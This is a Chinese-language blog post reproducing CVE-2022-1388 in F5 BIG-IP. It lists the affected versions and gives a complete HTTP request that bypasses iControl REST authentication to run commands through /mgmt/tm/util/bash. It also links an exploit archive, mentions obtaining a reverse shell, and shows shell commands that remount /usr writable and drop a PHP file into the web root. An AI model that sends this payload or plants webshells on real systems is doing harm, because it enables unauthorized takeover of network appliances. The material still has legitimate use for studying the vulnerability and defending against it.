banner
毅种循环

毅种循环

头顶铁锅接收宇宙能量

CVE-2022-1388 F5 BIG-IP未授权RCE漏洞&写Webshell


#

漏洞描述#

漏洞描述:
在 F5 BIG-IP 16.1.x 16.1.2.2 之前的版本、15.1.5.1 之前的 15.1.x 版本、14.1.4.6 之前的
14.1.x 版本、13.1.5 之前的 13.1.x 版本以及所有 12.1.x 和 11.6.x 版本,未公开的请求可能会绕过
iControl REST 身份验证。注意:未评估已达到技术支持终止 (EoTS) 的软件版本.

复现过程#

HTTP 请求包如下:

POST /mgmt/tm/util/bash HTTP/1.1
Host:xxxxxxx
Connection: keep-alive, x-F5-Auth-Token
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Content-Length: 45
Content-Type:application/json
{
"command":"run",
"utilCmdArgs":"-c id"
}

image

EXP/POC#


CVE-2022-1388-EXP-main.zip

Webshell 写入#

image
反弹获得了 shell。

Webshell 的写入可以参考另外一个漏洞 F5 BIG-IP CVE-2020-5902
写入的路径为:/usr/local/www

mount -o remount -rw /usr
echo "<?php phpinfo();?> " > /usr/local/www/test.php
mount -o remount -r /usr

访问路径:
image

image

参考#



F5 BIG-IP 远程代码执行漏洞复现(CVE-2020-5902)

CVE-2020-5902 BIG-IP RCE 分析研究


加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。